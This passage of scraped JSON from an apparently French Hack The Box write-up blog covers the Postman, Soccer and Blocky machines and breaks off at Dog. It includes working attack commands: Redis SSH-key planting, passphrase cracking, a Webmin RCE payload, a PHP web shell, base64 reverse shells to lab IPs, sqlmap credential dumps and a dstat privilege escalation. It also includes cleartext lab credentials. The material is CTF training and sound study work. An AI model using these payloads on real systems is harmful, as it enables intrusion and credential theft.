(port 6379): https://book.hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html\nOn teste plusieurs exploit. Finalement, on réussi à upload une clé ssh et à se connecter à l\u0026rsquo;utilisateur redis.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 ┌──(kali㉿kali)-[~/htb/Postman] └─$ ssh-keygen ... ... ┌──(kali㉿kali)-[~/htb/Postman] └─$ (echo -e \u0026#34;\\n\\n\u0026#34;; cat ./id_rsa.pub; echo -e \u0026#34;\\n\\n\u0026#34;) \u0026gt; spaced_key.txt ┌──(kali㉿kali)-[~/htb/Postman] └─$ cat spaced_key.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMg9HyTSSz/I3DToPpGZ7w5G9qM5cOWCoJB0YfaEngD1Biw1RQVRdcBtQyRa+mnJinaK5h2moZHxJyVagxmxjBrAGm0lB+kQnSNZsYFlSuPAKGu3kW/0xA2xQJMq3g5m9WkFZZVkuV++eCjFj0txnNOOKK1m92hWopoH6oK5UcIdDRPbI7gE+Ju6zTEWUcTZuSpVDhMYfwIsct3kkXIGERsvTESX7I9amEgzPN25B7a5vhbSoey/rb0FHvKP2Fg9AL+fUht/6p5YM8qQRxq/G2S7enRCH2G564hzyBOqr9sIILow7Skf1dJgR1ODI0nVQ6oMKWLz/Ef6h7KPn95/GCHDzrlFJkLNWgRsYTHDsv+fcaev26NDYSV/RIwPo2HhiecJqWBNuixObj/XCA533f3zaqx8XjnDQOkR2RZciZLh7V+unC4Kvm2XyQTwJ0wFWSP4IUxzTYaDCjMIRXpWTxka95lP/4/MPm++m7VmNDYN6ODO+UPpowzT4AuW2i78E= kali@kali ┌──(kali㉿kali)-[~/htb/Postman] └─$ cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set ssh_key OK ┌──(kali㉿kali)-[~/htb/Postman] └─$ redis-cli -h 10.10.10.160 10.10.10.160:6379\u0026gt; config set dir /var/lib/redis/.ssh OK 10.10.10.160:6379\u0026gt; config set dbfilename \u0026#34;authorized_keys\u0026#34; OK 10.10.10.160:6379\u0026gt; save OK ┌──(kali㉿kali)-[~/htb/Postman] └─$ ssh -i id_rsa redis@10.10.10.160 Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64) ... Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1 redis@Postman:~$ whoami redis redis -\u0026gt; Matt ssh key backup Grâce à linpeas, on trouve un fichier .bak avec des clés ssh.\n1 2 ╔══════════╣ Backup files (limited 100) -rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 /opt/id_rsa.bak Cependant, il faut déchiffrer cette clé et trouver la passphrase. On peut la convertir avec ssh2john puis ensuite tenter de la cracker avec rockyou.txt et john bien sûr :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ┌──(kali㉿kali)-[~/htb/Postman] └─$ ssh2john ./matt.key \u0026gt; matt.hash ┌──(kali㉿kali)-[~/htb/Postman] └─$ john --format=ssh matt.hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes Cost 2 (iteration count) is 2 for all loaded hashes Will run 2 OpenMP threads Press \u0026#39;q\u0026#39; or Ctrl-C to abort, almost any other key for status computer2008 (./matt.key) 1g 0:00:00:00 DONE (2025-03-13 11:08) 3.333g/s 822720p/s 822720c/s 822720C/s comunista..comett Use the \u0026#34;--show\u0026#34; option to display all of the cracked passwords reliably Session completed. On trouve la passphrase ! computer2008\nOn peut même déchiffrer définitevement la clé pour ne plus écrire le mot de passe:\n1 2 3 ┌──(kali㉿kali)-[~/htb/Postman] └─$ openssl rsa -in matt.key -out matt.decrypted_key -passin pass:computer2008 writing RSA key Cependant, la connexion SSH ne fonctionne pas. La clé n\u0026rsquo;est plus la bonne, mais la passphrase avec lequel elle etait chiffré nous a permis de nous connecter ensuite avec un \u0026ldquo;su\u0026rdquo; depusi le shell précédemment obtenu (user: redis) :\n1 2 3 4 redis@Postman:/opt$ su Matt Password: Matt@Postman:/opt$ whoami Matt Matt - user flag 1 2 3 4 5 Matt@Postman:/opt$ cd Matt@Postman:~$ ls user.txt Matt@Postman:~$ cat user.txt 9259.....a41d Privilege Escalation Authenticated RCE on webmin 1.910 On avait répérer au début de l\u0026rsquo;énumeration de la machine, que le service webmin pouvait potentiellement etre vulnérable à une RCE mais il fallait être connecté avec un utilisateur pour pouvoir l\u0026rsquo;exploiter. Nous avons désormais l\u0026rsquo;utilisateur Matt avec son mot de passe (computer2008).\nEn faisant quelques recherches sur internet, on trouve un script python sur github permettant d\u0026rsquo;exploiter cette vulnérabilité et d\u0026rsquo;executer des commandes.\nEn executant linpeas avec l\u0026rsquo;utilisateur Matt, et meme avec l\u0026rsquo;utilisateur redis, nous avions remarqué que webmin était executé en tant que root sur la machine ! En arrivant a exploiter la RCE sur webmin, on pourrait donc executer des commandes en tant que root :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ ╚════════════════════════════════════════════════╝ ╔══════════╣ Running processes (cleaned) ╚ Check weird \u0026amp; unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes ... redis 656 0.0 0.3 51576 3648 ? Ssl 10:44 0:13 /usr/bin/redis-server 0.0.0.0:6379 root 672 0.0 1.6 331332 14812 ? Ss 10:44 0:00 /usr/sbin/apache2 -k start www-data 673 0.0 1.1 335856 10116 ? S 10:44 0:00 _ /usr/sbin/apache2 -k start www-data 674 0.0 1.0 335840 10056 ? S 10:44 0:00 _ /usr/sbin/apache2 -k start www-data 675 0.0 1.1 335856 10120 ? S 10:44 0:00 _ /usr/sbin/apache2 -k start ... root 751 0.0 3.1 95308 29348 ? Ss 10:44 0:02 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf ## ^^^ ## ||| ## ||| On execute le python permettant d\u0026rsquo;exploiter webmin et on obtient un shell en tant que root: ( https://github.com/NaveenNguyen/Webmin-1.910-Package-Updates-RCE/tree/master )\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ┌──(kali㉿kali)-[~/htb/Postman] └─$ python3 webmin_exploit.py --ip_address 10.10.10.160 --port 10000 --lhost 10.10.14.13 --lport 1337 --user Matt --password computer2008 Webmin 1.9101- \u0026#39;Package updates\u0026#39; RCE [+] Generating Payload... [+] Reverse Payload Generated : u=acl%2Fapt\u0026amp;u=%20%7C%20bash%20-c%20%22%7Becho%2CcGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4xMzoxMzM3Iik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0%2BZmRvcGVuKCRjLHcpO3doaWxlKDw%2BKXtpZigkXz1%2BIC8oLiopLyl7c3lzdGVtICQxO319Oyc%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22\u0026amp;ok_top=Update+Selected+Packages [+] Attempting to login to Webmin [+] Login Successful [+] Attempting to Exploit [+] Exploited Successfully ---------------------------------------- ┌──(kali㉿kali)-[~] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.10.160] 41548 whoami root cat /root/root.txt a417.....1153 ","date":"2025-03-13T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/postman-htb/","title":"HTB | Postman"},{"content":" Machine name OS IP Difficulty Soccer Linux 10.10.11.194 Easy Users 1 player : PlayerOftheMatch2022 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 ┌──(kali㉿kali)-[~/htb/Soccer] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.194 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-10 18:21 EDT PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0= | 256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk= | 256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/ 80/tcp open http syn-ack nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://soccer.htb/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: nginx/1.18.0 (Ubuntu) 9091/tcp open xmltec-xmlmail? syn-ack | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix: | HTTP/1.1 400 Bad Request | Connection: close | GetRequest: | HTTP/1.1 404 Not Found | Content-Security-Policy: default-src \u0026#39;none\u0026#39; | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Content-Length: 139 | Date: Mon, 10 Mar 2025 22:22:14 GMT | Connection: close | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt; | \u0026lt;/head\u0026gt; | \u0026lt;body\u0026gt; | \u0026lt;pre\u0026gt;Cannot GET /\u0026lt;/pre\u0026gt; | \u0026lt;/body\u0026gt; | \u0026lt;/html\u0026gt; | HTTPOptions, RTSPRequest: | HTTP/1.1 404 Not Found | Content-Security-Policy: default-src \u0026#39;none\u0026#39; | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Content-Length: 143 | Date: Mon, 10 Mar 2025 22:22:14 GMT | Connection: close | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt; | \u0026lt;/head\u0026gt; | \u0026lt;body\u0026gt; | \u0026lt;pre\u0026gt;Cannot OPTIONS /\u0026lt;/pre\u0026gt; | \u0026lt;/body\u0026gt; |_ \u0026lt;/html\u0026gt; gobuster - tiny file manager 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ┌──(kali㉿kali)-[~] └─$ gobuster dir --url http://soccer.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://soccer.htb/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /tiny (Status: 301) [Size: 178] [--\u0026gt; http://soccer.htb/tiny/] On arrive ensuite sur une page de connexion \u0026ldquo;Tiny File Manager\u0026rdquo;. Après quelques recherches, on essaye les mots de passes par défaut et on trouve :\n1 admin : admin@123 Foothold Tiny file manager RCE : searchsploit Avec searchsploit on trouve un RCE authentifié.\n1 2 3 4 5 6 7 8 9 10 11 12 ┌──(kali㉿kali)-[~/htb/Soccer] └─$ searchsploit tiny file manager ---------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Manx 1.0.1 - \u0026#39;/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php\u0026#39; Multiple Cross-Site Scripting Vulnerabilities | php/webapps/36364.txt Manx 1.0.1 - \u0026#39;/admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php\u0026#39; Multiple Cross-Site Scripting Vulnerabilities | php/webapps/36365.txt MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload | php/webapps/15768.txt Tiny File Manager 2.4.6 - Remote Code Execution (RCE) | php/webapps/50828.sh TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload | php/webapps/15194.txt ---------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results RCE exploit On se connecte les creds par défaut :\nadmin : admin@123 On peut uploader facilement un fichier php dans le dossier tiny/uploads sur l\u0026rsquo;interface d\u0026rsquo;aministration: \u003c?php system($_GET['cmd']) ?\u003e Ensuite, on execute un reverse shell. On a mis la commande en base64 pour eviter les bugs avec les caractères spéciaux :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 $ http://soccer.htb/tiny/uploads/a.php?cmd=echo+c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTkvOTAwMSAwPiYx+|+base64+-d+|+bash ---------------------------------- ┌──(kali㉿kali)-[~/htb/Soccer] └─$ nc -lnvp 9001 listening on [any] 9001 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.11.194] 34268 sh: 0: can\u0026#39;t access tty; job control turned off $ whoami www-data $ python3 -c \u0026#34;import pty;pty.spawn(\u0026#39;/bin/bash\u0026#39;)\u0026#34; www-data@soccer:~/html/tiny/uploads$ export TERM=xterm export TERM=xterm www-data@soccer:~/html/tiny/uploads$ ^Z zsh: suspended nc -lnvp 9001 ┌──(kali㉿kali)-[~/htb/Soccer] └─$ stty raw -echo; fg [1] + continued nc -lnvp 9001 www-data@soccer:~/html/tiny/uploads$ www-data@soccer:~/html/tiny/uploads$ whoami www-data www-data@soccer:~/html/tiny/uploads$ cat /home/player/user.txt cat: /home/player/user.txt: Permission denied soc-player.soccer.htb A l\u0026rsquo;aide de linpeas, on trouve un autre nom de domaine qui nous donne accès à une nouvelle page.\n1 2 3 4 5 www-data@soccer:/tmp$ cat linpeas.out | grep soccer.htb 127.0.0.1 localhost soccer soccer.htb soc-player.soccer.htb server_name soc-player.soccer.htb; return 301 http://soccer.htb$request_uri; server_name soccer.htb; Searching for football tickets On arrive sur une page web où l\u0026rsquo;ont peut créer un compte puis se connecter. On a alors accès à une page avec un Ticket id. On peut rechercher si un ticket existe ou non en ecrivant un \u0026lsquo;id\u0026rsquo; de ticket, un nombre entier. Si le site web repond \u0026ldquo;Ticket exists\u0026rdquo;, alors le ticket existe. Sinon, si on a \u0026ldquo;Ticket doesn\u0026rsquo;t exist\u0026rdquo;, c\u0026rsquo;est qu\u0026rsquo;il n\u0026rsquo;existe pas. On essaye de tester une injection SQL :\n1 1 or 1=1; -- ça fonctionne! Il nous dit que le ticket est valide ! Alors qu\u0026rsquo;il est bien invalide normalement. On a donc ce qu\u0026rsquo;on appelle une Boolean (Blind ?) SQL Injection. C\u0026rsquo;est à dire qu\u0026rsquo;il faut faire des requetes à l\u0026rsquo;aveugle, et selon la réponse, Vrai ou faux, on déduit le nom des tables, colonnes etc.\nBoolean (Blind ?) SQL Injection 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 ┌──(kali㉿kali)-[~/htb/Soccer] └─$ sqlmap -u \u0026#34;ws://soc-player.soccer.htb:9091\u0026#34; --threads 10 --data \u0026#39;{\u0026#34;id\u0026#34;:\u0026#34;1\u0026#34;}\u0026#39; --batch -D soccer_db -T accounts --dump ___ __H__ ___ ___[,]_____ ___ ___ {1.8.11#stable} |_ -| . [)] | .\u0026#39;| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0026#39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 09:14:53 /2025-03-12/ JSON data found in POST body. Do you want to process it? [Y/n/q] Y [09:14:53] [INFO] resuming back-end DBMS \u0026#39;mysql\u0026#39; [09:14:53] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: JSON id ((custom) POST) Type: time-based blind Title: MySQL \u0026gt;= 5.0.12 AND time-based blind (query SLEEP) Payload: {\u0026#34;id\u0026#34;:\u0026#34;1 AND (SELECT 3147 FROM (SELECT(SLEEP(5)))ioMT)\u0026#34;} Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: {\u0026#34;id\u0026#34;:\u0026#34;-3742 OR 8591=8591\u0026#34;} --- [09:14:56] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL \u0026gt;= 5.0.12 [09:14:56] [INFO] fetching columns for table \u0026#39;accounts\u0026#39; in database \u0026#39;soccer_db\u0026#39; [09:14:56] [INFO] resumed: 4 [09:14:56] [INFO] retrieving the length of query output [09:14:56] [INFO] resumed: 5 [09:14:56] [INFO] resumed: email [09:14:56] [INFO] retrieving the length of query output [09:14:56] [INFO] resumed: 2 [09:14:56] [INFO] resumed: id [09:14:56] [INFO] retrieving the length of query output [09:14:56] [INFO] resumed: 8 [09:14:56] [INFO] resumed: password [09:14:56] [INFO] retrieving the length of query output [09:14:56] [INFO] resumed: 8 [09:14:56] [INFO] resumed: username [09:14:56] [INFO] fetching entries for table \u0026#39;accounts\u0026#39; in database \u0026#39;soccer_db\u0026#39; [09:14:56] [INFO] fetching number of entries for table \u0026#39;accounts\u0026#39; in database \u0026#39;soccer_db\u0026#39; [09:14:56] [INFO] retrieved: 1 [09:14:57] [INFO] retrieving the length of query output [09:14:57] [INFO] retrieved: 17 [09:14:59] [INFO] retrieved: player@player.htb [09:14:59] [INFO] retrieving the length of query output [09:14:59] [INFO] retrieved: 4 [09:15:00] [INFO] retrieved: 1324 [09:15:00] [INFO] retrieving the length of query output [09:15:00] [INFO] retrieved: 20 [09:15:02] [INFO] retrieved: PlayerOftheMatch2022 [09:15:02] [INFO] retrieving the length of query output [09:15:02] [INFO] retrieved: 6 [09:15:03] [INFO] retrieved: player Database: soccer_db Table: accounts [1 entry] +------+-------------------+----------------------+----------+ | id | email | password | username | +------+-------------------+----------------------+----------+ | 1324 | player@player.htb | PlayerOftheMatch2022 | player | +------+-------------------+----------------------+----------+ [09:15:03] [INFO] table \u0026#39;soccer_db.accounts\u0026#39; dumped to CSV file \u0026#39;/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb/dump/soccer_db/accounts.csv\u0026#39; [09:15:03] [INFO] fetched data logged to text files under \u0026#39;/home/kali/.local/share/sqlmap/output/soc-player.soccer.htb\u0026#39; [*] ending @ 09:15:03 /2025-03-12/ SSH connection to \u0026ldquo;player\u0026rdquo; 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 ┌──(kali㉿kali)-[~/htb/Soccer] └─$ ssh player@soc-player.soccer.htb The authenticity of host \u0026#39;soc-player.soccer.htb (10.10.11.194)\u0026#39; can\u0026#39;t be established. ED25519 key fingerprint is SHA256:PxRZkGxbqpmtATcgie2b7E8Sj3pw1L5jMEqe77Ob3FE. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added \u0026#39;soc-player.soccer.htb\u0026#39; (ED25519) to the list of known hosts. player@soc-player.soccer.htb\u0026#39;s password: Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed Mar 12 13:15:53 UTC 2025 System load: 0.0 Usage of /: 72.7% of 3.84GB Memory usage: 29% Swap usage: 0% Processes: 244 Users logged in: 0 IPv4 address for eth0: 10.10.11.194 IPv6 address for eth0: dead:beef::250:56ff:fe94:b9b0 0 updates can be applied immediately. The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Tue Dec 13 07:29:10 2022 from 10.10.14.19 player@soccer:~$ ls user.txt player@soccer:~$ cat user.txt 5868.....2f04 Privilege Escalation SUID Binary : doas On trouve le binaire SUID \u0026ldquo;doas\u0026rdquo; qui semble suspect, grâce à linpeas. En cherchant sur internet, on comprend comment il peut etre exploité. Dans un premier, il faut chercher le fichier de configuration :\n1 2 3 4 player@soccer:/usr/local/share/dstat$ find / -type f -name \u0026#34;doas.conf\u0026#34; 2\u0026gt;/dev/null /usr/local/etc/doas.conf player@soccer:/usr/local/share/dstat$ cat /usr/local/etc/doas.conf permit nopass player as root cmd /usr/bin/dstat On remarque que player à le droit d\u0026rsquo;executé /usr/bin/dstat en tant que root.\nAprès quelques recherches, on remarque sur linpeas qu\u0026rsquo;un dossier \u0026ldquo;/usr/local/share/dstat\u0026rdquo; est modifiable par root. Or, dstat a une liste de plugins qu\u0026rsquo;il peut recherche et load depuis certains dossiers, dont notamment celui là. C\u0026rsquo;est à dire que si on met un plugin dans ce dossier, nous avons un moyen d\u0026rsquo;executer le code de ce plugin en executant dstat. Nous avon le droit d\u0026rsquo;executer dstat en tant que root, le plugin va donc etre loadé puis son code executé avec les permissions super utilisateur :\n1 2 3 4 5 6 7 8 player@soccer:/usr/local/share/dstat$ echo \u0026#39;import os; os.execv(\u0026#34;/bin/sh\u0026#34;, [\u0026#34;sh\u0026#34;])\u0026#39; \u0026gt; ./dstat_xxx.py player@soccer:/usr/local/share/dstat$ /usr/local/bin/doas /usr/bin/dstat --xxx /usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module\u0026#39;s documentation for alternative uses import imp ## whoami root ## cat /root/root.txt 8217.....cc19 ","date":"2025-03-12T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/soccer-htb/","title":"HTB | Soccer"},{"content":" Machine name OS IP Difficulty Blocky Linux 10.10.10.37 Easy Users 1 notch : 8YsqfCTnvxAUeduzjNSXe22 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ┌──(kali㉿kali)-[~/htb/Blocky] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.37 PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 63 ProFTPD 1.3.5a 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXqVh031OUgTdcXsDwffHKL6T9f1GfJ1/x/b/dywX42sDZ5m1Hz46bKmbnWa0YD3LSRkStJDtyNXptzmEp31Fs2DUndVKui3LCcyKXY6FSVWp9ZDBzlW3aY8qa+y339OS3gp3aq277zYDnnA62U7rIltYp91u5VPBKi3DITVaSgzA8mcpHRr30e3cEGaLCxty58U2/lyCnx3I0Lh5rEbipQ1G7Cr6NMgmGtW6LrlJRQiWA1OK2/tDZbLhwtkjB82pjI/0T2gpA/vlZJH0elbMXW40Et6bOs2oK/V2bVozpoRyoQuts8zcRmCViVs8B3p7T1Qh/Z+7Ki91vgicfy4fl | 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNgEpgEZGGbtm5suOAio9ut2hOQYLN39Uhni8i4E/Wdir1gHxDCLMoNPQXDOnEUO1QQVbioUUMgFRAXYLhilNF8= | 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILqVrP5vDD4MdQ2v3ozqDPxG1XXZOp5VPpVsFUROL6Vj 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Did not follow redirect to http://blocky.htb |_http-server-header: Apache/2.4.18 (Ubuntu) 8192/tcp closed sophos reset ttl 63 25565/tcp open minecraft syn-ack ttl 63 Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20) Foothold Wordpress website : jar files Sur le port 80, on trouve un wordpress avec un endpoint /plugins. En effectuant une requête GET vers cette page, on trouve 2 fichiers dont BlockyCore.jar contenant le mot de passe suivant : 8YsqfCTnvxAUeduzjNSXe22\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ┌──(kali㉿kali)-[~/htb/Blocky] └─$ strings com/myfirstplugin/BlockyCore.class com/myfirstplugin/BlockyCore java/lang/Object sqlHost Ljava/lang/String; sqlUser sqlPass \u0026lt;init\u0026gt; Code localhost root 8YsqfCTnvxAUeduzjNSXe22 LineNumberTable LocalVariableTable ... FTP/SSH notch On trouve le user notch sur la page principale du wordpress. On l\u0026rsquo;utilise pour se connecter en ftp, avec le mot de passe trouvé précédemmente et ça fonctionne :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 ┌──(kali㉿kali)-[~/htb/Blocky] └─$ ftp 10.10.10.37 Connected to 10.10.10.37. 220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.10.10.37] Name (10.10.10.37:kali): notch 331 Password required for notch Password: 230 User notch logged in Remote system type is UNIX. Using binary mode to transfer files. ftp\u0026gt; ls 229 Entering Extended Passive Mode (|||25323|) 150 Opening ASCII mode data connection for file list drwxrwxr-x 7 notch notch 4096 Jul 3 2017 minecraft -r-------- 1 notch notch 33 Mar 10 09:54 user.txt 226 Transfer complete ftp\u0026gt; get user.txt local: user.txt remote: user.txt 229 Entering Extended Passive Mode (|||28224|) 150 Opening BINARY mode data connection for user.txt (33 bytes) 100% |*********************************************************************************************************************************************************************************************| 33 315.94 KiB/s 00:00 ETA 226 Transfer complete 33 bytes received in 00:00 (1.75 KiB/s) ftp\u0026gt; ^D 221 Goodbye. ┌──(kali㉿kali)-[~/htb/Blocky] └─$ cat user.txt 28f5.....2047 On peut également se connecte en SSH.\nPrivilege Escalation notch -\u0026gt; root L\u0026rsquo;utilisateur notch à le droit d\u0026rsquo;effectuer n\u0026rsquo;importe quelle commande en tant que root. Il nous suffit donc d\u0026rsquo;ouvrir un shell avec sudo su pour obtenir les droits root sur la machine.\n1 2 3 4 5 6 7 8 9 10 11 12 ┌──(kali㉿kali)-[~/htb/Blocky] └─$ ssh notch@10.10.10.37 notch@Blocky:~$ sudo -l [sudo] password for notch: Matching Defaults entries for notch on Blocky: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User notch may run the following commands on Blocky: (ALL : ALL) ALL notch@Blocky:~$ sudo su root@Blocky:/home/notch# cat /root/root.txt dc80.....2689 ","date":"2025-03-10T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/blocky-htb/","title":"HTB | Blocky"},{"content":" Machine name OS IP Difficulty Dog Linux 10.10.11.58 Easy Users 1 2 3 mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop tiffany : BackDropJ2024DS2024 johncusack : BackDropJ2024DS2024 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 ┌──(kali㉿kali)-[~/htb/Dog] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.58 PORT STATE SERVICE REASON VERSION 22/tcp 